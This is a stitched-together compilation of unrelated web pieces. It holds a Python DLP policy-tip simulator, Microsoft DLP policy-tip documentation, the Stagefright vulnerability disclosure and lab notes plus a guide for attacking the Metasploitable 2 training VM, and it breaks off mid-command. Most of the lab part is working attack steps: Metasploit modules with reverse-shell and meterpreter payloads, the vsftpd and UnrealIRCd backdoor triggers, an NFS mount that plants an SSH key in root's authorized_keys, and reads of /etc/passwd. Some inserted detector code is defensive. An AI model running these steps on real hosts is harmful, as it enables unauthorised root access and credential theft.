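    """One rule of a DLP policy: conditions on the left, actions on the right."""
    name: str
    priority: int                 # rule order in the policy; lower = higher priority (assumption)
    min_count: int                # minimum instances of the sensitive information type
    max_count: Optional[int]      # None means "any"
    external_only: bool           # condition "Content is shared with: People outside my organization"
    block_access: bool = False
    allow_override: bool = False
    require_justification: bool = False
    incident_report: bool = False


# The two PCI DSS template rules from this page, plus a constructed third rule.
RULES = [
    Rule("PCI DSS: Scan content shared outside – low count", 1, 1, 9, True),
    Rule("PCI DSS: Scan content shared outside – high count", 2, 10, None, True,
         block_access=True, allow_override=True, require_justification=True,
         incident_report=True),
    Rule("Constructed: notify on any card number", 3, 1, None, False),
]


def rule_matches(rule: Rule, count: int, shared_externally: bool) -> bool:
    """Apply the rule's conditions: instance count window and sharing scope."""
    if count < rule.min_count:
        return False
    if rule.max_count is not None and count > rule.max_count:
        return False
    if rule.external_only and not shared_externally:
        return False
    return True


def select_policy_tip(matched: list) -> Optional[Rule]:
    """Only the most restrictive, highest-priority rule's policy tip is shown."""
    if not matched:
        return None
    # Blocking rules sort before notify-only rules; ties go to the higher priority.
    return sorted(matched, key=lambda r: (not r.block_access, r.priority))[0]


def evaluate(rules: list, count: int, shared_externally: bool) -> dict:
    """Combine the actions of every matched rule and pick the policy tip to show."""
    matched = [r for r in rules if rule_matches(r, count, shared_externally)]
    tip = select_policy_tip(matched)
    return {
        "matched": [r.name for r in matched],
        "policy_tip": tip.name if tip else None,
        "notify": bool(matched),
        "block_access": any(r.block_access for r in matched),
        "incident_report": any(r.incident_report for r in matched),
        "allow_override": bool(tip and tip.allow_override),
        "require_justification": bool(tip and tip.require_justification),
    }


def override(result: dict, justification: str = "") -> dict:
    """Override via the shown policy tip: lifts the block on every matched rule;
    the notification itself cannot be overridden."""
    if not result["allow_override"]:
        raise PermissionError("the shown policy tip does not allow override")
    if result["require_justification"] and not justification.strip():
        raise ValueError("a business justification is required")
    lifted = dict(result)
    lifted["block_access"] = False
    lifted["overridden"] = list(result["matched"])   # all matched rules, not just the shown one
    lifted["justification"] = justification.strip()  # logged for the DLP reports
    return lifted


if __name__ == "__main__":
    print(evaluate(RULES, 3, shared_externally=True))
    high = evaluate(RULES, 12, shared_externally=True)
    print(high)
    print(override(high, "Quarterly audit export approved by finance"))
```

A document with 12 card numbers shared externally matches both the high-count rule and the constructed rule, but only the blocking rule's tip is shown, and overriding it (with a justification) clears the block for both matched rules while the notification still goes out.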

Policy tips on OneDrive for Business sites and SharePoint Online sites

When a document on a OneDrive for Business site or SharePoint Online site matches a rule in a DLP policy, and that rule uses policy tips, the policy tips display special icons on the document:

  1. If the rule sends a notification about the file, the warning icon appears.
  2. If the rule blocks access to the document, the blocked icon appears.

Policy tip icons on documents in a OneDrive account

To take action on a document, select the item, choose the Information icon in the upper-right corner of the page to open the details pane, and then choose View policy tip.

The policy tip lists the issues with the content, and if the policy tips are configured with these options, you can choose Resolve, and then Override the policy tip or Report a false positive.

Information pane showing policy tip

Policy tip with option to override

DLP policies are synced to sites and content is evaluated against them periodically and asynchronously, so there may be a short delay between the time you create the DLP policy and the time you begin to see policy tips. There may be a similar delay from when you resolve or override a policy tip to when the icon on the document on the site goes away.

Default text for policy tips on sites

By default, policy tips display text similar to the following for an item on a site. The notification text is configured separately for each rule, so the text that’s displayed differs depending on which rule is matched.

If the DLP policy rule does this… → then the default policy tip says this…
  • Sends a notification but doesn’t allow override → "This item conflicts with a policy in your organization."
  • Blocks access, sends a notification, and allows override → "This item conflicts with a policy in your organization. If you don’t resolve this conflict, access to this file might be blocked."
  • Blocks access and sends a notification → "This item conflicts with a policy in your organization. Access to this item is blocked for everyone except its owner, last modifier, and the primary site collection administrator."

Custom text for policy tips on sites

You can customize the text for policy tips separately from the email notification. Unlike custom text for email notifications (see above section), custom text for policy tips does not accept HTML or tokens. Instead, custom text for policy tips is plain text only with a 256-character limit.

Policy tips in Outlook on the web and Outlook 2013 and later

When you compose a new email in Outlook on the web and Outlook 2013 and later, you’ll see a policy tip if you add content that matches a rule in a DLP policy, and that rule uses policy tips. The policy tip appears at the top of the message, above the recipients, while the message is being composed.

Policy tip at the top of a message being composed

Policy tips work whether the sensitive information appears in the message body, subject line, or even a message attachment as shown here.

Policy tip showing that an attachment conflicts with a DLP policy

If the policy tips are configured to allow override, you can choose Show Details > Override > enter a business justification or report a false positive > Override.

Policy tip in message expanded to show Override option

Policy tip dialog where you can override the policy tip

Note that when you add sensitive information to an email, there may be latency between when the sensitive information is added and when the policy tip appears.

Policy tips in the Exchange Admin Center vs. the Office 365 Security & Compliance Center

Policy tips can work either with DLP policies and mail flow rules created in the Exchange Admin Center, or with DLP policies created in the Office 365 Security & Compliance Center, but not both. This is because these policies are stored in different locations, but policy tips can draw only from a single location.

If you’ve configured policy tips in the Exchange Admin Center, any policy tips that you configure in the Office 365 Security & Compliance Center won’t appear to users in Outlook on the web and Outlook 2013 and later until you turn off the tips in the Exchange Admin Center. This ensures that your current Exchange transport rules will continue to work until you choose to switch over to the Office 365 Security & Compliance Center.

Note that while policy tips can draw only from a single location, email notifications are always sent, even if you’re using DLP policies in both the Office 365 Security & Compliance Center and the Exchange Admin Center.

Default text for policy tips in email

By default, policy tips display text similar to the following for email.

If the DLP policy rule does this… → then the default policy tip says this…
  • Sends a notification but doesn’t allow override → "Your email conflicts with a policy in your organization."
  • Blocks access, sends a notification, and allows override → "Your email conflicts with a policy in your organization."
  • Blocks access and sends a notification → "Your email conflicts with a policy in your organization."

Policy tips in Excel 2016, PowerPoint 2016, and Word 2016

When people work with sensitive content in the desktop versions of Excel 2016, PowerPoint 2016, and Word 2016, policy tips can notify them in real time that the content conflicts with a DLP policy. This requires that:

  • The Office document is stored on a OneDrive for Business site or SharePoint Online site.
  • The site is included in a DLP policy that’s configured to use policy tips.

These Office 2016 desktop programs automatically sync DLP policies directly from Office 365, and then scan your documents to ensure that they don’t conflict with your DLP policies and display policy tips in real time.

Depending on how you configure the policy tips in the DLP policy, people can choose to simply ignore the policy tip, override the policy with or without a business justification, or report a false positive.

Policy tips appear on the Message Bar.

Message bar shows policy tip in Excel 2016

And policy tips also appear in the Backstage view (on the File tab).

Backstage shows policy tip in Excel 2016

If policy tips in the DLP policy are configured with these options, you can choose Resolve to Override a policy tip or Report a false positive.

Options on policy tip in Backstage in Excel 2016

In each of these Office 2016 desktop programs, people can choose to turn off policy tips. If turned off, policy tips that are simple notifications will not appear on the Message Bar or Backstage view (on the File tab). However, policy tips about blocking and overriding will still appear, and people will still receive the email notification. In addition, turning off policy tips does not exempt the document from any DLP policies that have been applied to it.

Default text for policy tips in Excel 2016, PowerPoint 2016, and Word 2016

By default, policy tips display text similar to the following on the Message Bar and Backstage view of an open document. The notification text is configured separately for each rule, so the text that’s displayed differs depending on which rule is matched.

If the DLP policy rule does this… → then the default policy tip says this…
  • Sends a notification but doesn’t allow override → "This file conflicts with a policy in your organization. Go to the File menu for more information."
  • Blocks access, sends a notification, and allows override → "This file conflicts with a policy in your organization. If you don’t resolve this conflict, access to this file might be blocked. Go to the File menu for more information."
  • Blocks access and sends a notification → "This file conflicts with a policy in your organization. If you don’t resolve this conflict, access to this file might be blocked. Go to the File menu for more information."

Custom text for policy tips in Excel 2016, PowerPoint 2016, and Word 2016

You can customize the text for policy tips separately from the email notification. Unlike custom text for email notifications (see above section), custom text for policy tips does not accept HTML or tokens. Instead, custom text for policy tips is plain text only with a 256-character limit.

Experts Found a Unicorn in the Heart of Android

Gaining remote code execution privileges merely by having access to the mobile number? Enter Stagefright.

The targets for this kind of attack can be anyone from prime ministers, government officials and company executives to security officers and IT managers.

Built on tens of gigabytes of source code from the Android Open Source Project (AOSP), the leading smartphone operating system carries scary code at its heart. Named Stagefright, it is a media library that processes several popular media formats. Since media processing is often time-sensitive, the library is implemented in native code (C++), which is more prone to memory corruption than memory-safe languages like Java.

Zimperium zLabs VP of Platform Research and Exploitation, Joshua J. Drake (@jduck), dived into the deepest corners of Android code and discovered what we believe to be the worst Android vulnerabilities discovered to date. These issues in Stagefright code critically expose 95% of Android devices, an estimated 950 million devices. Drake’s research, to be presented at Black Hat USA on August 5 and DEF CON 23 on August 7, found multiple remote code execution vulnerabilities that can be exploited using various methods, the worst of which requires no user interaction.

Attackers only need your mobile number, with which they can remotely execute code via a specially crafted media file delivered via MMS. A fully weaponized, successful attack could even delete the message before you see it; you would only see the notification. These vulnerabilities are extremely dangerous because they do not require the victim to take any action to be exploited. Unlike spear-phishing, where the victim needs to open a PDF file or a link sent by the attacker, this vulnerability can be triggered while you sleep. Before you wake up, the attacker will remove any signs of the device being compromised and you will continue your day as usual, with a trojaned phone.

These screenshots were taken on a Nexus 5 (hammerhead) running the latest version, Android Lollipop 5.1.1.


Android and derivative devices from version 2.2 onward are vulnerable. Devices running Android versions prior to Jelly Bean (roughly 11% of devices) are at the worst risk due to inadequate exploit mitigations. If ‘Heartbleed’ from the PC era sends a chill down your spine, this is much worse.

The Stagefright vulnerability was assigned the following CVEs:

CVE-2015-1538
CVE-2015-1539
CVE-2015-3824
CVE-2015-3826
CVE-2015-3827
CVE-2015-3828
CVE-2015-3829

In this unique scenario, Zimperium not only reported the vulnerability to the Google teams, but also submitted patches. Considering the severity of the problem, Google acted promptly and applied the patches to internal code branches within 48 hours, but unfortunately that’s only the beginning of what will be a very lengthy process of update deployment.

Remediation:

Zimperium’s advanced Enterprise Mobile Threat Protection solution, zIPS, protects its enterprise customers from Stagefright vulnerability.

For the mobile devices without zIPS protection, fixes for these issues require an OTA firmware update for all affected devices. Such updates for Android devices have traditionally taken a long time to reach users. Devices older than 18 months are unlikely to receive an update at all. We hope that members of the Android ecosystem will recognize the severity of these issues and take immediate action. In addition to fixing these individual issues, we hope they will also fix any business processes that prevent or slow the uptake of such fixes.

That said, two groups of users are already protected against all reported issues. Users of SilentCircle’s Blackphone have been protected against these issues as of the release of PrivatOS version 1.1.7. Mozilla’s Firefox, which is also affected, has included fixes for these issues since version 38. We applaud these vendors for prioritizing security and releasing patches for these issues quickly.

If you’re an end user or enterprise, contact your device manufacturer and/or carrier to ascertain whether or not your particular device has been updated with the requisite patches. If you’re part of any of the various parties that ship derivative versions of Android that might be affected, we encourage you to reach out to obtain the patches from us directly.

Acknowledgements:

We would like to thank Google’s Android Security Team for taking these issues seriously, addressing them by including our patches in the Android Open Source Project, and coordinating with members of the Open Handset Alliance (OHA) to get the issues addressed in official Android compatible devices. Additionally, we’d like to thank Mozilla’s Firefox team and SilentCircle’s Blackphone team for shipping fixes in their respective software releases.
See more at: http://blog.zimperium.com/experts-found-a-unicorn-in-the-heart-of-android/

Hacking WiFi Password via CMD

First, you need to find the Wi-Fi networks around you that are broadcasting their SSID. This is done by listing the saved Wi-Fi profiles, as shown in the image below.
After finding the targets, pick one and view the details of its Wi-Fi profile.
Now, view the key by requesting the profile with the key shown in clear text.

This process can be repeated for the Wi-Fi networks around you. This tutorial is created for educational purposes only; use at your own risk.

Metasploitable 2 lab-2

Hacking UNIX FTP Server via vsftpd:
Run BackTrack or Kali Linux
Open a terminal and run Metasploit (msfconsole), or launch it from the BackTrack menu
Run the following commands
 msf> nmap -sV -p 21
(You will find whether there is an FTP server on the target and port 21 is open)
 msf> search vsftp
(Available exploits will be shown)
 msf> use exploit/unix/ftp/vsftpd_234_backdoor
 msf> info exploit/unix/ftp/vsftpd_234_backdoor
 msf> show options
 msf> set RHOST
 msf> show payloads
(You will get the available payloads)
 msf> set payload cmd/unix/interact
 msf> exploit
(Game over: the target is under your control and you are in its shell)
You can run the following commands in the victim shell

id
uname -a
ifconfig
whoami
cat /etc/passwd
Type exit, and exit again, to leave the session

Hacking UNIX Server via UnrealIRCd 3.2.8.1 backdoor:
 Run BackTrack or Kali Linux
 Open a terminal and run Metasploit (msfconsole), or launch it from the BackTrack menu
Run the following commands
 msf> nmap -sV -p 6667
(You will find whether UnrealIRCd is on the target and port 6667 is open)
 msf> search unrealircd
(Available exploits will be shown)
 msf> use exploit/unix/irc/unreal_ircd_3281_backdoor
 msf> info exploit/unix/irc/unreal_ircd_3281_backdoor
 msf> show options
 msf> set RHOST
 msf> show payloads
(You will get a list of all available payloads)
 msf> exploit


Hacking Web Server via PHP CGI Argument Injection:
 Run BackTrack or Kali Linux
 Open a terminal and run Metasploit (msfconsole), or launch it from the BackTrack menu
 Run the following commands
 msf> nmap -sV -p 80
(You will find an Apache httpd 2.2.8 ((Ubuntu) DAV/2) on the target with port 80 open)
Browse to the vulnerable web server's phpMyAdmin, for example http://192.168.132.9/phpmyadmin/
(You will get the phpMyAdmin page; if you instead browse to http://192.168.132.9/phpmyadmin/?-s the server shows its server-side PHP source code)

 msf> search php_cgi
(Available exploits will be shown)
 msf> info exploit/multi/http/php_cgi_arg_injection
 msf> use exploit/multi/http/php_cgi_arg_injection
 msf> show payloads
(You will get a list of all available payloads)
 msf> set payload php/meterpreter/reverse_tcp
 msf> show options
 msf> set RHOST (if required)
 msf> set LHOST (if required)
 msf> exploit
You will get a meterpreter session in which you can run several remote shell commands, like these:
sysinfo
ls
cat index.php
(You can now see the source code of index.php. GAME OVER)


DRuby Distributed Ruby Code Execution
 Run BackTrack or Kali Linux
 Open a terminal and run Metasploit (msfconsole), or launch it from the BackTrack menu
 Run the following commands
 msf> nmap -sV -p 0-65535
(You will find an unknown service on the target with port 8787/tcp open)
 msf> amap 8787
(You can see that a Ruby/dRuby service is running)
 msf> search drb
 msf> info exploit/linux/misc/drb_remote_codeexec
 msf> use exploit/linux/misc/drb_remote_codeexec
 msf> show payloads
 msf> set payload cmd/unix/reverse
 msf> show options
 msf> set URI druby://:8787
 msf> set LHOST
 msf> exploit
(Game over) You can type the following commands in the remote host session
id
uname -a
ifconfig
whoami
Press Ctrl+C and y to abort the session

Java RMI Server – Java Code Execution
 Run BackTrack or Kali Linux
 Open a terminal and run Metasploit (msfconsole), or launch it from the BackTrack menu
 Run the following commands
 msf> nmap -sV -p 0-65535
(You will find rmiregistry on the target with port 1099/tcp open)
 msf> search rmiregistry
 msf> info exploit/multi/misc/java_rmi_server
 msf> use exploit/multi/misc/java_rmi_server
 msf> show payloads
 msf> show options
 msf> set RHOST
 msf> exploit
(Game over) You will get a meterpreter session and can type the following commands in the remote host session
sysinfo
shell
id
uname -a
ifconfig
whoami
cat /etc/passwd
Type exit, and exit again, to abort the session


Samba "username map script" Remote Command Execution
 Run BackTrack or Kali Linux
 Open a terminal and run Metasploit (msfconsole), or launch it from the BackTrack menu
 Run the following commands
 msf> nmap -sV -p 0-65535
(You will find netbios-ssn on the target with port 139/tcp open)
 msf> search samba
 msf> info exploit/multi/samba/usermap_script
 msf> use exploit/multi/samba/usermap_script
 msf> set RHOST
 msf> exploit
(Game over) You will get a meterpreter session and can type the following commands in the remote host session
id
uname -a
ifconfig
whoami
cat /etc/passwd
Press Ctrl+C, then type y, and exit again to abort the session

NFS Misconfiguration – Access via SSH
 Run BackTrack or Kali Linux
 Open a terminal and run Metasploit (msfconsole), or launch it from the BackTrack menu
 Run the following commands
 nmap -sV -p 0-65535
(You will find open ports on the target such as ssh 22/tcp, rpcbind 111/tcp and nfs 2049/tcp)
 ssh root@
(You will get a "Permission denied (publickey,password)" message)
 rpcinfo -p
(You will get all the NFS information for versions 2, 3 and 4)
 showmount -e
(You can see the export list for the target IP address)
 ssh-keygen (This generates a new SSH key pair; its public key will be added to the target)
 mkdir /tmp/test
 mount -t nfs :/ /tmp/test/ -o nolock
 cat ~/.ssh/id_rsa.pub >> /tmp/test/root/.ssh/authorized_keys
 umount /tmp/test/
 ssh root@
(You are now logged in to the remote server and can view its system information)
ifconfig
id
uname -a
whoami
cat /etc/passwd
Type exit, and exit again, to abort the session

Caution: do not use this for any illegal activity and if done you and only you will be responsible for that.

Metasploitable 2 lab

Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques.

The default login and password is msfadmin:msfadmin.

Never expose this VM to an untrusted network (use NAT or Host-only mode if you have any questions what that means).
The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms. By default, Metasploitable’s network interfaces are bound to the NAT and Host-only network adapters, and the image should never be exposed to a hostile network. (Note: A video tutorial on installing Metasploitable 2 is available at the link .)

This document outlines many of the security flaws in the Metasploitable 2 image. Currently missing is documentation on the web server and web application flaws as well as vulnerabilities that allow a local user to escalate to root privileges. This document will continue to expand over time as many of the less obvious flaws with this platform are detailed.

Getting Started

After the virtual machine boots, login to console with username msfadmin and password msfadmin. From the shell, run the ifconfig command to identify the IP address.

msfadmin@metasploitable:~$ ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:9a:52:c1
          inet addr:192.168.99.131  Bcast:192.168.99.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe9a:52c1/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1

Services

From our attack system (Linux, preferably something like Kali Linux), we will identify the open network services on this virtual machine using the Nmap Security Scanner. The following command line will scan all TCP ports on the Metasploitable 2 instance:

root@ubuntu:~# nmap -p0-65535 192.168.99.131

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-05-31 21:14 PDT
Nmap scan report for 192.168.99.131
Host is up (0.00028s latency).
Not shown: 65506 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
25/tcp    open  smtp
53/tcp    open  domain
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
512/tcp   open  exec
513/tcp   open  login
514/tcp   open  shell
1099/tcp  open  rmiregistry
1524/tcp  open  ingreslock
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
3306/tcp  open  mysql
3632/tcp  open  distccd
5432/tcp  open  postgresql
5900/tcp  open  vnc
6000/tcp  open  X11
6667/tcp  open  irc
6697/tcp  open  unknown
8009/tcp  open  ajp13
8180/tcp  open  unknown
8787/tcp  open  unknown
39292/tcp open  unknown
43729/tcp open  unknown
44813/tcp open  unknown
55852/tcp open  unknown
MAC Address: 00:0C:29:9A:52:C1 (VMware)

Nearly every one of these listening services provides a remote entry point into the system. In the next section, we will walk through some of these vectors.

Services: Unix Basics

TCP ports 512, 513, and 514 are known as “r” services, and have been misconfigured to allow remote access from any host (a standard “.rhosts + +” situation). To take advantage of this, make sure the rsh-client package is installed (on Ubuntu), and run the following command as your local root user. If you are prompted for an SSH key, this means the rsh-client tools have not been installed and Ubuntu is defaulting to SSH.

# rlogin -l root 192.168.99.131
Last login: Fri Jun 1 00:10:39 EDT 2012 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
root@metasploitable:~#

This is about as easy as it gets. The next service we should look at is the Network File System (NFS). NFS can be identified by probing port 2049 directly or by asking the portmapper for a list of services. The example below uses rpcinfo to identify NFS and showmount -e to determine that the “/” share (the root of the file system) is being exported. You will need the rpcbind and nfs-common Ubuntu packages to follow along.

root@ubuntu:~# rpcinfo -p 192.168.99.131
   program vers proto   port  service
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  53318  status
    100024    1   tcp  43729  status
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    4   udp   2049  nfs
    100021    1   udp  46696  nlockmgr
    100021    3   udp  46696  nlockmgr
    100021    4   udp  46696  nlockmgr
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100021    1   tcp  55852  nlockmgr
    100021    3   tcp  55852  nlockmgr
    100021    4   tcp  55852  nlockmgr
    100005    1   udp  34887  mountd
    100005    1   tcp  39292  mountd
    100005    2   udp  34887  mountd
    100005    2   tcp  39292  mountd
    100005    3   udp  34887  mountd
    100005    3   tcp  39292  mountd

root@ubuntu:~# showmount -e 192.168.99.131
Export list for 192.168.99.131:
/ *

Getting access to a system with a writeable filesystem like this is trivial. To do so (and because SSH is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account’s authorized_keys file:

root@ubuntu:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
root@ubuntu:~# mkdir /tmp/r00t
root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/
root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys
root@ubuntu:~# umount /tmp/r00t
root@ubuntu:~# ssh root@192.168.99.131
Last login: Fri Jun 1 00:29:33 2012 from 192.168.99.128
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
root@metasploitable:~#
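A defender-side check for the NFS misconfiguration shown above (and in the "NFS Misconfiguration" lab notes earlier on this page): it parses `showmount -e` output from the client side and an `/etc/exports` file from the server side, and flags a root filesystem exported to every host. This is an added example, not part of the Metasploitable guide; the exports file below is constructed, and the severity labels are this example's own.

```python
from __future__ import annotations

from dataclasses import dataclass


@dataclass(frozen=True)
class Export:
    path: str
    clients: tuple[str, ...]   # e.g. ("*",) or ("192.168.99.0/24",)
    options: tuple[str, ...]   # server-side options; empty for showmount data


@dataclass(frozen=True)
class Finding:
    path: str
    severity: str
    reason: str


def parse_showmount(output: str) -> list[Export]:
    """Parse `showmount -e HOST` output: a header line, then 'PATH CLIENTS' per line."""
    exports = []
    for line in output.splitlines()[1:]:
        parts = line.split()
        if len(parts) >= 2:
            exports.append(Export(parts[0], tuple(parts[1].split(",")), ()))
    return exports


def parse_exports_file(text: str) -> list[Export]:
    """Parse /etc/exports lines of the form 'PATH client(opts) client(opts) ...'."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *entries = line.split()
        for entry in entries or ["*"]:  # a path with no client list is exported to everyone
            client, _, opts = entry.partition("(")
            options = tuple(o for o in opts.rstrip(")").split(",") if o)
            exports.append(Export(path, (client or "*",), options))
    return exports


def audit(exports: list[Export]) -> list[Finding]:
    """Flag world-readable/writeable exports, root filesystem exports and no_root_squash."""
    findings = []
    for e in exports:
        world = any(c == "*" or c.startswith("*") for c in e.clients)
        if e.path == "/" and world:
            findings.append(Finding(e.path, "critical", "root filesystem exported to every host"))
        elif e.path == "/":
            findings.append(Finding(e.path, "high", "root filesystem exported"))
        elif world:
            findings.append(Finding(e.path, "high", "export open to every host"))
        if "no_root_squash" in e.options:
            findings.append(Finding(e.path, "high", "no_root_squash lets a remote root write as root"))
        if "rw" in e.options and world:
            findings.append(Finding(e.path, "medium", "world-writeable export"))
    return findings


# The showmount output from the guide above, and a constructed /etc/exports.
SHOWMOUNT_SAMPLE = "Export list for 192.168.99.131:\n/ *\n"
EXPORTS_SAMPLE = """\
# constructed /etc/exports, not the VM's real file
/ *(rw,no_root_squash)
/srv/share 192.168.99.0/24(ro,root_squash)
"""
```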

Services: Backdoors

On port 21, Metasploitable 2 runs vsftpd, a popular FTP server. This particular version contains a backdoor that was slipped into the source code by an unknown intruder. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. If a username is sent that ends in the sequence “:)” (a happy face), the backdoored version will open a listening shell on port 6200. We can demonstrate this with telnet or use the Metasploit Framework module to exploit it automatically:

root@ubuntu:~# telnet 192.168.99.131 21
Trying 192.168.99.131...
Connected to 192.168.99.131.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user backdoored:)
331 Please specify the password.
pass invalid
^]
telnet> quit
Connection closed.
root@ubuntu:~# telnet 192.168.99.131 6200
Trying 192.168.99.131...
Connected to 192.168.99.131.
Escape character is '^]'.
id;
uid=0(root) gid=0(root)

On port 6667, Metasploitable 2 runs the UnrealIRCd IRC daemon. This version contains a backdoor that went unnoticed for months, triggered by sending the letters “AB” followed by a system command to the server on any listening port. Metasploit has a module to exploit this in order to gain an interactive shell, as shown below.

msfconsole
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.99.131
msf exploit(unreal_ircd_3281_backdoor) > exploit
[*] Started reverse double handler
[*] Connected to 192.168.99.131:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 8bMUYsfmGvOLHBxe;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "8bMUYsfmGvOLHBxe\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:60257) at 2012-05-31 21:53:59 -0700
id
uid=0(root) gid=0(root)
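Detection logic for the two source-level backdoors described above (the vsftpd 2.3.4 username trigger and the UnrealIRCd 3.2.8.1 "AB" prefix), added here as an example that is not part of the Metasploitable guide: it scans captured plaintext client lines and checks a listener listing for the shell port 6200. The session records and the `ss -ltn`-style lines are constructed; the record and alert types are this example's own.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

VSFTPD_SHELL_PORT = 6200          # backdoor shell port stated in the guide above
IRC_PORTS = {6667, 6697}          # UnrealIRCd ports from the nmap scan above


@dataclass(frozen=True)
class Capture:
    src: str
    dst_port: int
    payload: str   # one line as sent by the client, without CRLF


@dataclass(frozen=True)
class Alert:
    rule: str
    src: str
    detail: str


_FTP_USER = re.compile(r"^USER\s+(.+)$", re.IGNORECASE)


def detect_backdoor_triggers(captures: list[Capture]) -> list[Alert]:
    """Return one alert per captured line that carries a documented backdoor trigger."""
    alerts: list[Alert] = []
    for c in captures:
        if c.dst_port == 21:
            m = _FTP_USER.match(c.payload)
            # The guide describes the trigger as a username ending in ":)";
            # matching it anywhere in the username is the conservative choice.
            if m and ":)" in m.group(1):
                alerts.append(Alert("vsftpd-234-backdoor-trigger", c.src,
                                    f"USER {m.group(1)!r}"))
        elif c.dst_port in IRC_PORTS:
            # Legitimate IRC lines start with a verb such as NICK or USER;
            # a line starting with "AB" is the documented trigger prefix.
            if c.payload.startswith("AB"):
                alerts.append(Alert("unrealircd-3281-backdoor-trigger", c.src,
                                    c.payload[:40]))
    return alerts


def unexpected_listeners(ss_lines: list[str],
                         watch: frozenset[int] = frozenset({VSFTPD_SHELL_PORT})) -> list[int]:
    """Return watched ports that appear as LISTEN sockets in `ss -ltn`-style output."""
    found = set()
    for line in ss_lines:
        parts = line.split()
        if len(parts) < 4 or parts[0] != "LISTEN":
            continue
        local = parts[3]                       # e.g. 0.0.0.0:6200 or [::]:6200
        try:
            port = int(local.rsplit(":", 1)[-1])
        except ValueError:
            continue
        if port in watch:
            found.add(port)
    return sorted(found)


SAMPLE_CAPTURES = [  # constructed
    Capture("192.168.99.128", 21, "USER msfadmin"),
    Capture("192.168.99.128", 21, "USER backdoored:)"),
    Capture("192.168.99.128", 21, "PASS invalid"),
    Capture("192.168.99.128", 6667, "NICK analyst"),
    Capture("192.168.99.128", 6667, "AB id"),
]

SAMPLE_SS = [  # constructed, `ss -ltn` layout: State Recv-Q Send-Q Local:Port Peer:Port
    "State  Recv-Q Send-Q Local Address:Port Peer Address:Port",
    "LISTEN 0      32     0.0.0.0:21        0.0.0.0:*",
    "LISTEN 0      1      0.0.0.0:6200      0.0.0.0:*",
]
```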

Much less subtle is the old standby “ingreslock” backdoor that is listening on port 1524. The ingreslock port was a popular choice a decade ago for adding a backdoor to a compromised server. Accessing it is easy:

root@ubuntu:~# telnet 192.168.99.131 1524
Trying 192.168.99.131...
Connected to 192.168.99.131.
Escape character is '^]'.
root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)

Services: Unintentional Backdoors

In addition to the malicious backdoors in the previous section, some services are almost backdoors by their very nature. The first of these installed on Metasploitable 2 is distccd. This program makes it easy to scale large compiler jobs across a farm of like-configured systems. The problem with this service is that an attacker can easily abuse it to run a command of their choice, as demonstrated by the Metasploit module usage below.

msfconsole
msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > set RHOST 192.168.99.131
msf exploit(distcc_exec) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo uk3UdiwLUq0LX3Bi;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "uk3UdiwLUq0LX3Bi\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:38897) at 2012-05-31 22:06:03 -0700
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

Samba, when configured with a writeable file share and “wide links” enabled (default is on), can also be used as a backdoor of sorts to access files that were not meant to be shared. The example below uses a Metasploit module to provide access to the root filesystem using an anonymous connection and a writeable share.

root@ubuntu:~# smbclient -L //192.168.99.131
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk
        IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))

root@ubuntu:~# msfconsole
msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.99.131
msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp
